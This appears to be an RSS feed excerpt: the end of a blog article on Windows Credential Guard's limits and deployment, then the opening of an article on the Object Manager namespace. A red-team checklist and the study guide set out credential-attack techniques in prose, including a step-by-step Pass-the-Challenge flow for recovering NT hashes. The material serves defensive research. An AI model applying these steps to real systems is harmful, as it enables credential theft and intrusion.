&lt;p&gt;The considerations page [@ms-cg-considerations] names PEAP-MSCHAPv2 / EAP-MSCHAPv2 WiFi and VPN configurations as the most consequential remaining surface in 2026: a corporate WiFi or VPN endpoint that authenticates users with MS-CHAPv2 still cracks under the same offline tradecraft as the original NTLMv1 attacks, because the protocol itself uses MD4 + DES against the user&apos;s NT hash. The recommendation: &quot;organizations move away from passwords to other authentication methods, such as Windows Hello for Business, FIDO 2 security keys, or smart cards&quot; [@ms-cg-considerations], or migrate the WiFi / VPN endpoint to certificate-based PEAP-TLS / EAP-TLS.&lt;/p&gt;
&lt;h3&gt;8.5 Out-of-LSA credential storage&lt;/h3&gt;
&lt;p&gt;Four storage locations are out of scope for Credential Guard by Microsoft&apos;s own design:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Generic Credential Manager entries&lt;/strong&gt; -- web passwords, browser-stored credentials, the Windows Credential Manager&apos;s &quot;Web Credentials&quot; tab. &quot;Generic credentials, such as user names and passwords that you use to sign in websites, aren&apos;t protected since the applications require your clear-text password.&quot; [@ms-cg-considerations]&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Non-Microsoft Security Support Providers.&lt;/strong&gt; &quot;Some non-Microsoft Security Support Providers (SSPs and APs) might not be compatible with Credential Guard because it doesn&apos;t allow non-Microsoft SSPs to ask for password hashes from LSA. ... For example, using the KerbQuerySupplementalCredentialsMessage API isn&apos;t supported.&quot; [@ms-cg-considerations] Third-party SSPs that depend on hash retrieval through that API simply break under Credential Guard.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Active Directory database on domain controllers.&lt;/strong&gt; &quot;Credential Guard doesn&apos;t protect the Active Directory database running on Windows Server domain controllers.&quot; [@ms-cg-howitworks] The most-attacked LSASS on the network -- &lt;code&gt;lsass.exe&lt;/code&gt; on the domain controller, holding &lt;code&gt;NTDS.dit&lt;/code&gt; and the &lt;code&gt;krbtgt&lt;/code&gt; long-term key -- is explicitly out of Credential Guard&apos;s scope. Microsoft&apos;s stated rationale is that domain controllers do not benefit from the same isolation, because the entire AD database is, by design, available to the LSA process on a DC.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Credential-input pipelines such as Remote Desktop Gateway and Just-In-Time admin access tooling&lt;/strong&gt;, where the typed cleartext is supplied to &lt;code&gt;lsass.exe&lt;/code&gt; over an inbound network protocol and is in clear at the moment of arrival.&lt;/li&gt;
&lt;/ul&gt;

Doesn&apos;t prevent an attacker with malware on the PC from using the privileges associated with any credential. We recommend using dedicated PCs for high value accounts. -- Microsoft Learn, *How Credential Guard works* [@ms-cg-howitworks]

flowchart LR
    CG[&quot;What CG closes:&lt;br /&gt;Long-term key in lsass.exe memory&quot;]
    R1[&quot;Pass-the-Challenge:&lt;br /&gt;trustlet RPC output&lt;br /&gt;(Lyak, Dec 2022)&quot;]
    R2[&quot;Credential use without theft:&lt;br /&gt;Kerberoast, AS-REP Roast,&lt;br /&gt;RBCD / KrbRelayUp&quot;]
    R3[&quot;Token impersonation:&lt;br /&gt;Hot/Rotten/Juicy/PrintSpoofer&lt;br /&gt;SeImpersonatePrivilege&quot;]
    R4[&quot;Plaintext protocols:&lt;br /&gt;NTLMv1, MS-CHAPv2, Digest,&lt;br /&gt;CredSSP&quot;]
    R5[&quot;Out-of-LSA storage:&lt;br /&gt;Web creds, non-MS SSPs,&lt;br /&gt;NTDS.dit on DCs&quot;]
    CG -.does not close.-&amp;gt; R1
    CG -.does not close.-&amp;gt; R2
    CG -.does not close.-&amp;gt; R3
    CG -.does not close.-&amp;gt; R4
    CG -.does not close.-&amp;gt; R5
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The trustlet is the storage layer; the agent is the use layer; an attacker who controls the agent can request derived material the trustlet was never going to refuse. This is the structural reason Credential Guard was never going to close the use surface.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Five classes documented; five worked examples named. What is &lt;em&gt;not yet&lt;/em&gt; documented -- the open problems where the research is still in progress -- is what the next section walks.&lt;/p&gt;
&lt;h2&gt;9. Open problems&lt;/h2&gt;
&lt;p&gt;Five things the Credential Guard architecture has not yet closed. One of them is structural; four are deployment frontiers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;9.1 Trustlet IUM API surface fuzzing.&lt;/strong&gt; Pass-the-Challenge proved one corner of the agent-callable RPC surface is exploitable when fed inputs the developer did not anticipate (the static &lt;code&gt;1122334455667788&lt;/code&gt; challenge whose responses are pre-computed in commercial cracking tables). The systematic audit of every IUM API entry point -- there are not many; the trustlet is small -- has not been published. A blue-team-friendly fuzzer that exercises the channel from a controlled VTL0 agent against a controlled VTL1 target is on the public to-do list of several research groups.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;9.2 Domain-controller LSASS / &lt;code&gt;NTDS.dit&lt;/code&gt; / &lt;code&gt;krbtgt&lt;/code&gt; protection.&lt;/strong&gt; Microsoft documents the DC carve-out as out of scope [@ms-cg-howitworks]. An architectural fix would require a DC-resident trustlet model that can answer Kerberos AS-REP and TGS-REP queries against the entire &lt;code&gt;NTDS.dit&lt;/code&gt; without compromising AD replication semantics. That model is not on the public roadmap, and the practical recommendation -- the dedicated-Tier-0-PAW model from the &lt;em&gt;Mitigating Pass-the-Hash&lt;/em&gt; v2 playbook [@ms-lsa-protection] -- still applies in 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;9.3 TGT and service-ticket lifetime in &lt;code&gt;lsass.exe&lt;/code&gt; after the trustlet mints them.&lt;/strong&gt; Pass-the-Ticket on the agent recovers the &lt;em&gt;current&lt;/em&gt; TGT or service ticket from &lt;code&gt;lsass.exe&lt;/code&gt; memory. Credential Guard isolates the long-term key; it does not isolate the per-session derived material that the agent has to hold to send on the wire. The trustlet&apos;s TGT protection [@ms-cg-howitworks] is verbatim: the long-term-key path is closed, the service-ticket path is not. A 2026 attacker with &lt;code&gt;SeDebugPrivilege&lt;/code&gt; who dumps &lt;code&gt;lsass.exe&lt;/code&gt; recovers the &lt;em&gt;Kerberos service tickets&lt;/em&gt; even though they cannot recover the underlying NTOWF.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;9.4 Pass-the-Cookie / token-lift class against derived material.&lt;/strong&gt; Microsoft Entra Primary Refresh Token (PRT) [@ms-entra-prt] cookies issued by the trustlet to the agent become bearer tokens until the session ends. Per-token device binding raises the bar (the cookie is bound to a TPM-bound device key, so use of the cookie outside the device is detectable by the cloud), but it does not close the class for an attacker who has on-device persistence and can replay the cookie from the same device.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;9.5 Compatibility and observability frontier.&lt;/strong&gt; The third-party SSP / MS-CHAPv2 / CredSSP behaviour-change surface keeps showing up in real-estate compatibility reports. Microsoft&apos;s &lt;em&gt;Considerations&lt;/em&gt; page [@ms-cg-considerations] is updated routinely; the practical operational pattern in 2026 is &quot;pilot Credential Guard via Intune on a representative ring for 30 days, harvest the compatibility errors, fix or replace the affected SSPs, then broaden enforcement.&quot; That pattern is now well-trodden but the per-estate inventory is real work.&lt;/p&gt;
&lt;p&gt;Open problems are interesting; daily practice is more interesting. What does a 2026 administrator, researcher, red-team operator, and detection engineer actually do with Credential Guard?&lt;/p&gt;
&lt;h2&gt;10. Practical guide&lt;/h2&gt;
&lt;p&gt;Four audiences; four operational checklists. Each is short because each builds on a section we have already walked.&lt;/p&gt;
&lt;h3&gt;For an administrator or platform engineer&lt;/h3&gt;
&lt;p&gt;Verify Credential Guard is running using the three supported surfaces [@ms-cg-configure]: &lt;code&gt;(Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning&lt;/code&gt; should contain &lt;code&gt;1&lt;/code&gt;; &lt;code&gt;msinfo32&lt;/code&gt; should list &quot;Credential Guard&quot; under Virtualization-based Security Services Running; the System event log should show WinInit Event 13. Deploy via Intune Settings Catalog or GPO with &quot;Enabled without lock&quot; [@ms-cg-configure]. Inventory NTLMv1, MS-CHAPv2, Digest, CredSSP, and non-Microsoft SSP usage &lt;em&gt;before&lt;/em&gt; enabling, because those are the protocols that will lose SSO under Credential Guard.&lt;/p&gt;

On a Credential-Guard-on box, the following one-liner returns `True`:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;(Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning -contains 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;1&lt;/code&gt; corresponds to Credential Guard in the &lt;code&gt;SecurityServicesRunning&lt;/code&gt; bitmask [@ms-cg-configure]. Pair with the System event log filter &lt;code&gt;EventID=13, Source=Wininit&lt;/code&gt; to confirm the boot-time launch event. Use these to verify, not Task Manager: Microsoft explicitly disrecommends the Task Manager check.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Credential Guard should be enabled before a device is joined to a domain or before a domain user signs in for the first time. If Credential Guard is enabled after domain join, the user and device secrets may already be compromised.&quot; [@ms-cg-configure] On a default-on Windows 11 22H2+ deployment this is automatic; on legacy estates being migrated, a re-image or other clean-provisioning path is the safest way to get that guarantee.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;For a security researcher&lt;/h3&gt;
&lt;p&gt;The verifiable trustlet artefacts are: the &lt;code&gt;.tpolicy&lt;/code&gt; PE section in &lt;code&gt;LsaIso.exe&lt;/code&gt;; the &lt;code&gt;s_IumPolicyMetadata&lt;/code&gt; export; the dual-EKU signature with the IUM EKU 1.3.6.1.4.1.311.10.3.37 visible in the certificate chain. The IUM-side enumeration approach is &lt;code&gt;NtQuerySystemInformation&lt;/code&gt; with the &lt;code&gt;SystemIsolatedUserModeInformation&lt;/code&gt; class. Quarkslab&apos;s IUM-debugging walkthrough [@quarkslab-falcon-ium] documents the nested-virt setup (VMware L1 + Hyper-V L2), the GDB-stub attach on &lt;code&gt;hvix64.exe&lt;/code&gt;, the patch on &lt;code&gt;SecureKernel!SkpsIsProcessDebuggingEnabled&lt;/code&gt; to force-return 1, and the walk to &lt;code&gt;SecureKernel.exe&lt;/code&gt; from &lt;code&gt;HvCallVtlReturn&lt;/code&gt; at hypercall ID 0x12. Lyak&apos;s PassTheChallenge methodology [@github-passthechallenge] is the canonical worked example for the agent-side trustlet RPC interaction.&lt;/p&gt;
&lt;h3&gt;For a red-team operator&lt;/h3&gt;
&lt;p&gt;Assume the long-term hash and TGT are not in &lt;code&gt;lsass.exe&lt;/code&gt;. Assume the trustlet&apos;s RPC output is. The 2026 LPE / credential playbook focuses on credential &lt;em&gt;use&lt;/em&gt; (Kerberoast against weak service-account passwords; AS-REP Roast against accounts with &lt;code&gt;DONT_REQ_PREAUTH&lt;/code&gt;; RBCD via KrbRelayUp [@github-krbrelayup]; AD CS misconfigurations -- the ESC1-ESC11 enumeration), token impersonation (the PrintSpoofer / Potato chain [@itm4n-printspoofer]), and supplied-credential capture (keylogger on the prompt path). The companion NTLMless article in this series [@paragmali-ntlmless] covers the protocol-removal frontier that closes the Pass-the-Challenge NTLMv1 leg specifically.&lt;/p&gt;
&lt;h3&gt;For a detection engineer&lt;/h3&gt;
&lt;p&gt;WinInit Events 15, 16, and 17 (&quot;Credential Guard configured but did not run&quot;) are a high-fidelity &quot;attacker disabled Credential Guard&quot; detection -- if the box is supposed to be Credential-Guard-on and the boot-time event logs show one of those IDs, something blocked the trustlet from launching. ETW Microsoft-Antimalware-Engine plus AMSI [@ms-amsi] on &lt;code&gt;lsass.exe&lt;/code&gt; security-package load is the high-fidelity detection surface for Pass-the-Challenge-style injection (the attacker has to load a security-package DLL into &lt;code&gt;lsass.exe&lt;/code&gt; to get the established ALPC channel). On the network side, a &lt;code&gt;crack.sh&lt;/code&gt; submission carrying the static &lt;code&gt;1122334455667788&lt;/code&gt; challenge is an indicator of Pass-the-Challenge cracking activity by an internal user.&lt;/p&gt;
&lt;p&gt;Three misconceptions about Credential Guard get asked in every defensive-architecture review. The FAQ that follows resolves them, with primary citations for each answer.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;
&lt;p&gt;These are the seven questions that come up in every Credential Guard architectural review. Each answer is grounded in a primary source.&lt;/p&gt;

No. The *long-lived* NTLM hash and the Kerberos *long-term key* are unstealable from VTL0 memory; the per-session Kerberos service tickets are not protected, though the TGT is [@ms-cg-howitworks]. Pass-the-Ticket on the agent recovers the current session&apos;s tickets even on a Credential-Guard-on box. The architectural pivot is &quot;long-lived secret out of the agent&apos;s memory,&quot; not &quot;no secret in the agent&apos;s memory.&quot;

Yes. The dump succeeds; the contents are different. Where the NT hash field used to hold the bytes of the hash, [the field now holds the literal string `[LSA Isolated Data]` followed by an opaque ciphertext](https://github.com/ly4k/PassTheChallenge), with embedded `Context Handle`, `Proxy Info`, and `DPAPI` GUID fields. The encrypted blob is AES-GCM-wrapped by the trustlet under a key the agent does not hold. The dump is a statement of architecture, not a statement of failure.

No. Kerberoasting [@attack-kerberoast] cracks the service account&apos;s NT hash from a TGS-REP delivered over the wire by the KDC. No memory of the Credential-Guard-protected box is ever read. The mitigation for Kerberoasting is strong service-account passwords (or moving to managed service accounts with auto-rotated 240-character passwords), not Credential Guard.

No. The Potato chain [@itm4n-printspoofer] (Hot, Rotten, Juicy, PrintSpoofer, RoguePotato, GodPotato) escalates from a service user with `SeImpersonatePrivilege` to NT AUTHORITY\SYSTEM by impersonating a coerced inbound SYSTEM authentication. The chain operates on *tokens*, not *credentials*. Credential Guard protects credentials.

No, by design. Microsoft documents the carve-out verbatim: &quot;Enabling Credential Guard on domain controllers isn&apos;t recommended. Credential Guard doesn&apos;t provide any added security to domain controllers, and can cause application compatibility issues on domain controllers.&quot; [@ms-cg-overview] The most-attacked LSASS on the network -- on the domain controller, holding `NTDS.dit` and the `krbtgt` long-term key -- is explicitly out of scope. The mitigations for DC LSASS are physical and procedural: dedicated Tier-0 Privileged Access Workstations, no general-purpose interactive logon, and the *Mitigating Pass-the-Hash* v2 playbook [@ms-lsa-protection].

No. PPL is kernel-enforced inside the NT TCB; Credential Guard is a VTL1 trustlet outside it. itm4n&apos;s writeup is explicit: &quot;LSA Protection tends to be confused with Credential Guard, which is completely different ... Credential Guard and LSA Protection are actually complementary.&quot; [@itm4n-runasppl] Both should be enabled. PPL raises the bar for opportunistic attackers; Credential Guard moves the secret across a TCB boundary that an NT-kernel-mode attacker cannot cross.

Because the application chains through a protocol that cannot use Credential-Guard-protected credentials. &quot;When Credential Guard is enabled, NTLMv1, MS-CHAPv2, Digest, and CredSSP can&apos;t use the signed-in credentials&quot; [@ms-cg-howitworks]; third-party SSPs that depend on `KerbQuerySupplementalCredentialsMessage` simply break under Credential Guard [@ms-cg-considerations]. The remediation is to migrate the application to a supported protocol (Kerberos with AES, certificate-based EAP-TLS / PEAP-TLS, or Hello-for-Business per-application keys).
&lt;p&gt;The empty hash from §1 is, in 2026, a property of every domain-joined Windows 11 22H2+ box on the planet. Eleven years of &lt;code&gt;lsass.exe&lt;/code&gt; extraction history made the architectural pivot inevitable; eight years of trustlet maturation have made the pivot the default. What remains -- the use surface, the protocol surface, the token surface, the typed-credential surface, the third-party-SSP surface -- is the next eleven years of work.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;credential-guard-lsass-isolation-the-canonical-vbs-trustlet&quot; keyTerms={[
  { term: &quot;lsass.exe&quot;, definition: &quot;The user-mode Windows service that handles authentication and (until Credential Guard) held every long-lived credential in process memory. The agent in the agent / trustlet split.&quot; },
  { term: &quot;LsaIso.exe&quot;, definition: &quot;The Credential Guard trustlet (Trustlet ID 1) running in VTL1, holding the NTOWF and Kerberos long-term keys behind a hypervisor boundary.&quot; },
  { term: &quot;NTOWF&quot;, definition: &quot;The MD4 of the UTF-16-LE password. Functionally equivalent to the password for any NTLM-speaking service; the canonical Pass-the-Hash credential.&quot; },
  { term: &quot;Pass-the-Hash&quot;, definition: &quot;An attack class in which the client proves possession of the NTOWF without knowing the cleartext password. Originally published by Paul Ashton in 1997.&quot; },
  { term: &quot;Pass-the-Challenge&quot;, definition: &quot;Lyak&apos;s December 2022 attack class against Credential Guard: inject into lsass.exe, call NtlmIumCalculateNtResponse against the static challenge 1122334455667788, submit to crack.sh, recover the NT hash in ~30 seconds.&quot; },
  { term: &quot;PPL (Protected Process Light)&quot;, definition: &quot;A signer-level NT-kernel-enforced isolation mechanism that prevents non-PPL callers from opening lsass.exe for memory read. Bypassable from kernel via mimidrv.sys and from userland (on legacy Windows) via PPLdump.&quot; },
  { term: &quot;Trustlet&quot;, definition: &quot;A Microsoft-signed binary loaded by the Secure Kernel into VTL1 user mode at boot. Identified by Trustlet ID; constrained by Signature Level 12 and the dual-EKU (WSCV + IUM) signature.&quot; },
  { term: &quot;VTL0 / VTL1&quot;, definition: &quot;Virtual Trust Levels enforced by the Hyper-V hypervisor. VTL0 = Normal World (NT kernel + user-mode); VTL1 = Secure World (Secure Kernel + IUM trustlets).&quot; },
  { term: &quot;IUM (Isolated User Mode)&quot;, definition: &quot;The Ring-3 user mode component of VTL1; the address space in which trustlets execute.&quot; },
  { term: &quot;ALPC&quot;, definition: &quot;Advanced Local Procedure Call: the Windows IPC primitive used to carry the LSA_ISO_RPC_SERVER channel between lsass.exe in VTL0 and LsaIso.exe in VTL1.&quot; },
  { term: &quot;Kerberoasting&quot;, definition: &quot;An attack on Kerberos service-account passwords by requesting TGS-REP tickets for arbitrary SPNs and cracking the etype-23 RC4-encrypted portion offline. Disclosed by Tim Medin at DerbyCon 4 (September 2014).&quot; },
  { term: &quot;RBCD (Resource-Based Constrained Delegation)&quot;, definition: &quot;A Kerberos delegation feature abused via the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute to mint service tickets as any user against a target. Refined by Forshaw 2022; weaponised in KrbRelayUp.&quot; },
  { term: &quot;SeImpersonatePrivilege&quot;, definition: &quot;The Windows token privilege held by service accounts that allows ImpersonateLoggedOnUser. The basis of the entire Potato escalation family.&quot; },
  { term: &quot;DPAPI&quot;, definition: &quot;The Windows per-user secret-protection API. The DPAPI GUID in the [LSA Isolated Data] block ties the trustlet record to the on-disk per-user master-key chain.&quot; },
  { term: &quot;VSM master key&quot;, definition: &quot;A symmetric key generated and stored only in VTL1, sealed by the TPM under PCR-bound policy, that wraps any persistent state the trustlets need to survive reboots.&quot; }
]} questions={[
  { q: &quot;Why did Microsoft conclude in 2014 that no patch could fix the LSASS-extraction class?&quot;, a: &quot;Because the secret is in a process whose memory is governed by the same NT kernel an attacker with administrator can subvert. Generations 0-4 add layers (PPL, WDigest disable, Protected Users, Tier-0 isolation) inside the NT-kernel TCB; only changing the TCB (moving the secret to a kernel the attacker cannot reach) addresses the structural problem.&quot; },
  { q: &quot;Distinguish LSA Protection (RunAsPPL) from Credential Guard.&quot;, a: &quot;PPL is NT-kernel-enforced; the same kernel an attacker is trying to subvert. Credential Guard is hypervisor-enforced; the secret moves to a separate kernel (the Secure Kernel / VTL1) the NT-kernel attacker cannot cross. They are complementary, not substitutes.&quot; },
  { q: &quot;What is in the encrypted blob field of a Pypykatz [LSA Isolated Data] dump on a Credential-Guard-on box?&quot;, a: &quot;An AES-GCM-wrapped serialised record containing (among other fields) the NTOWF, with a length-prefixed header (verbatim hex prefix a000000000000000080000006400000001000000010100000100000036) and an embedded ASCII tag 4e746c6d48617368 = NtlmHash that names the wrapped field. The wrap key is held only in VTL1 by LsaIso.exe.&quot; },
  { q: &quot;Walk the Pass-the-Challenge attack flow end to end.&quot;, a: &quot;Inject SecurityPackage.dll into lsass.exe; extract Context Handle from the Pypykatz dump; call NtlmIumCalculateNtResponse over the established ALPC channel with the static challenge 1122334455667788; receive the trustlet-computed NTLMv1 response; submit to crack.sh; receive the NT hash in approximately 30 seconds. The trustlet is faithful; the agent&apos;s request is the attack surface.&quot; },
  { q: &quot;Why is Pass-the-Challenge a class property of the agent / trustlet split rather than a Microsoft bug?&quot;, a: &quot;If lsass.exe could not call the trustlet, the trustlet would be useless (no path from wire challenge to response). If lsass.exe can call the trustlet, an attacker who compromises lsass.exe inherits the channel. Closing the gap structurally requires moving protocol code into the trustlet, which would dramatically expand the trustlet TCB and is not on Microsoft&apos;s roadmap.&quot; },
  { q: &quot;Name three things Credential Guard explicitly does not protect.&quot;, a: &quot;Domain controllers (NTDS.dit, krbtgt long-term key); credential use without theft (Kerberoasting, AS-REP Roasting, RBCD); SeImpersonatePrivilege Potato chain (token, not credential); plaintext-secret protocols (NTLMv1, MS-CHAPv2, Digest, CredSSP); out-of-LSA storage (web credentials, non-Microsoft SSPs, Remote Desktop Gateway prompt path).&quot; },
  { q: &quot;Why was default-on Credential Guard shipped without UEFI Lock?&quot;, a: &quot;To allow administrators to disable the feature remotely if a third-party SSP or MS-CHAPv2-dependent workflow breaks. The trade-off is that an attacker who has already obtained the privilege required to flip the registry value can also disable Credential Guard. Microsoft chose the operational reality of remote-disable convenience over the in-principle attacker-disable hardening.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>credential-guard</category><category>lsaiso</category><category>vbs-trustlets</category><category>lsass</category><category>mimikatz</category><category>pass-the-challenge</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Object Manager Namespace: The Hierarchical Filesystem Underneath Every Windows Security Boundary</title><link>https://paragmali.com/blog/the-object-manager-namespace/</link><guid isPermaLink="true">https://paragmali.com/blog/the-object-manager-namespace/</guid><description>A bottom-up tour of the Windows Object Manager namespace, the 1993 Cutler-era kernel data structure that every Windows security boundary quietly assumes.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
**The Windows Object Manager namespace is the kernel-resident, filesystem-shaped tree that every Windows security boundary quietly assumes.** Every named kernel object -- processes, threads, sections, files, registry keys, tokens, mutants, semaphores, ALPC ports, devices, drivers, jobs, silos -- lives somewhere under `\`. Six generations of isolation primitives (Session 0 isolation, AppContainer lowbox, integrity levels, VBS trustlets, Server Silos, and the `ObRegisterCallbacks` EDR sensor surface) are all path rewrites, per-directory ACLs, or kernel callbacks layered on the same 1993 Cutler-era four-piece structure. This article builds the namespace bottom-up -- `OBJECT_HEADER`, `OBJECT_TYPE`, `ParseProcedure`, `OBJECT_DIRECTORY` -- walks the 2026 top-level directory atlas on Windows 11 25H2, surveys the exploit tradition (symbolic-link redirection, namespace squatting, bait-and-switch on `\??` and `\Device`, arbitrary directory creation), and closes on the EDR pivot in `ObRegisterCallbacks`.
&lt;h2&gt;1. The path that isn&apos;t a path&lt;/h2&gt;
&lt;p&gt;Open &lt;code&gt;WinObj.exe&lt;/code&gt; as administrator on any Windows 11 25H2 machine (&lt;a href=&quot;https://en.wikipedia.org/wiki/Windows_11_version_history&quot; rel=&quot;noopener&quot;&gt;Windows 11 version history&lt;/a&gt;). For about ten seconds the screen looks like a filesystem. The root is named &lt;code&gt;\&lt;/code&gt;. Below it sit folders called &lt;code&gt;\Device&lt;/code&gt;, &lt;code&gt;\BaseNamedObjects&lt;/code&gt;, &lt;code&gt;\Sessions&lt;/code&gt;, &lt;code&gt;\RPC Control&lt;/code&gt;, &lt;code&gt;\KnownDlls&lt;/code&gt;, and &lt;code&gt;\ObjectTypes&lt;/code&gt;. Double-click any of them and you see children. Right-click any node and you can read a security descriptor. This is essentially the same UI a 1996 SysAdmin would have recognised; the tool first shipped that year as part of Mark Russinovich and Bryce Cogswell&apos;s Winternals [@en-wikipedia-mark-russinovich], and the current build is a Microsoft-signed Sysinternals binary whose navigation surface has not been redesigned in three decades [@ms-winobj].&lt;/p&gt;
&lt;p&gt;Navigate to &lt;code&gt;\Sessions\1\AppContainerNamedObjects&lt;/code&gt; and the picture starts to fracture. Inside that directory you will find one subdirectory per running AppContainer-sandboxed app, each named after a long Security Identifier of the form &lt;code&gt;S-1-15-2-...&lt;/code&gt;. Pick the one belonging to the Microsoft Edge renderer process you are reading this article in. Every named mutant, event, section, semaphore, and ALPC port the renderer can ever name lives inside that one subdirectory. The renderer cannot escape it. Not because of a permission check that comes second, but because the kernel rewrites every name the renderer asks for, transparently, before path resolution begins. Microsoft&apos;s AppContainer Isolation documentation [@ms-appcontainer-isolation] calls this &quot;sandboxing the application kernel objects.&quot;&lt;/p&gt;
&lt;p&gt;This tree is not a filesystem. There is no disk persistence; nothing under &lt;code&gt;\&lt;/code&gt; survives a reboot. It is not the Windows registry either; the registry is a separate subsystem with its own hive format that hangs off the namespace only through a parse procedure on the &lt;code&gt;Key&lt;/code&gt; object type. What this tree is, instead, is the Object Manager namespace: the in-memory, kernel-resident, hierarchical name service that the Windows kernel uses to locate every nameable kernel object [@ms-managing-kernel-objects]. Its top-level directories are catalogued in the driver kit&apos;s Object Directories reference [@ms-object-directories].&lt;/p&gt;

The Windows Object Manager, internally called `Ob`, is a kernel-mode subsystem of the Windows Executive that manages the lifetime, naming, security, and accounting of every resource the kernel exposes to user mode as a named object. Wikipedia summarises it as a &quot;subsystem implemented as part of the Windows Executive which manages Windows resources... each [resource] reside[s] in a namespace for categorization&quot; [@en-wikipedia-object-manager].
&lt;p&gt;Here is the thesis the rest of this article spends nine thousand words unpacking. Every Windows security boundary you have read about -- Session 0 isolation, Mandatory Integrity Control, AppContainer, the Virtualization-Based Security trustlets, Server Silos and Windows containers, the EDR sensor surface that fires when something opens a handle to &lt;code&gt;lsass.exe&lt;/code&gt; -- is &lt;em&gt;physically realised&lt;/em&gt; in this tree. Each boundary is either a path rewrite at lookup time, a per-directory ACL, a token-keyed name substitution, or a kernel callback registered against an &lt;code&gt;OBJECT_TYPE&lt;/code&gt;. The boundaries you read about elsewhere are the &lt;em&gt;policies&lt;/em&gt;; this tree is the &lt;em&gt;mechanism&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The Object Manager has shipped without architectural change for thirty-three years. Whose decision was that? And why did a 1993 data structure survive untouched while the GUI, the driver model, the security subsystem, and the boot path around it were rewritten more than once?&lt;/p&gt;
&lt;h2&gt;2. Where the namespace came from&lt;/h2&gt;
&lt;p&gt;The decision belongs to Dave Cutler. In 1988 Microsoft hired Cutler away from Digital Equipment Corporation. The Wikipedia biography records the line of operating systems Cutler had developed at DEC: &quot;RSX-11M, VAXELN, VMS, and MICA&quot; [@en-wikipedia-dave-cutler]. Three of those shipped commercially; the fourth, MICA, was cancelled with the Prism RISC program. Cutler walked out, and Microsoft signed him with a charter from Bill Gates to build a portable next-generation kernel that could host the existing Windows API on top of a 32-bit, multi-architecture base [@en-wikipedia-architecture-of-windows-nt]. Cutler brought a small team of DEC veterans with him.&lt;/p&gt;
&lt;p&gt;The Object Manager is one of that team&apos;s earliest design decisions. The architectural bet was to &lt;em&gt;unify every named kernel object&lt;/em&gt; under one filesystem-shaped tree, with each type carrying a parse procedure so a single family of syscalls (&lt;code&gt;NtCreateFile&lt;/code&gt;, &lt;code&gt;NtOpenSection&lt;/code&gt;, &lt;code&gt;NtOpenProcess&lt;/code&gt;, and so on) could address files, registry keys, processes, ports, sections, drivers, devices, jobs, and synchronization primitives using the same path-walk algorithm. That was an unusual choice in 1989. VMS had a more typed, less unified resource broker. Mach treated kernel objects as capability-style port rights and never gave them a hierarchical name. Cutler&apos;s choice was, at heart, a Plan-9-style &quot;every named resource is a filesystem path&quot; idea, imported into a Windows shell.Plan 9 from Bell Labs (Pike, Thompson, et al.) was the academic articulation of the &quot;everything is a path&quot; property: every kernel-named resource, including processes and network connections, surfaced as a file under a 9P-served namespace. Plan 9 never reached commercial scale, but its design idea reached production through NT, and through Linux&apos;s /proc, /sys, and FUSE.&lt;/p&gt;
&lt;p&gt;Windows NT 3.1 shipped on July 27, 1993. It was &quot;Microsoft&apos;s first 32-bit operating system,&quot; supported on IA-32, DEC Alpha, and MIPS [@en-wikipedia-windows-nt-3-1]. The Object Manager was already one of its executive subsystems, sitting alongside the I/O Manager, the Memory Manager, the Process Manager, the Security Reference Monitor, and the Local Procedure Call subsystem [@en-wikipedia-architecture-of-windows-nt]. The four pieces this article will rebuild from scratch -- the &lt;code&gt;OBJECT_HEADER&lt;/code&gt; that prefixes every object in memory, the &lt;code&gt;OBJECT_TYPE&lt;/code&gt; singleton that owns each type&apos;s method table, the &lt;code&gt;ParseProcedure&lt;/code&gt; that delegates path resolution to the owning subsystem, and the &lt;code&gt;OBJECT_DIRECTORY&lt;/code&gt; hash table that maps names to objects -- were all in the NT 3.1 kernel. None of them has been rearchitected since.&lt;/p&gt;
&lt;p&gt;That same year, Microsoft Press published &lt;em&gt;Inside Windows NT&lt;/em&gt;, written by technical writer Helen Custer with a Foreword by Cutler himself. The book&apos;s Object Manager chapter is the canonical pre-2000 description of the namespace, cited on the Sysinternals WinObj page [@ms-winobj] as &quot;Helen Custer&apos;s &lt;em&gt;Inside Windows NT&lt;/em&gt; provides a good overview of the Object Manager namespace.&quot; Custer&apos;s book has been out of print for two decades, but the citation chain through Russinovich&apos;s tool is durable.&lt;/p&gt;
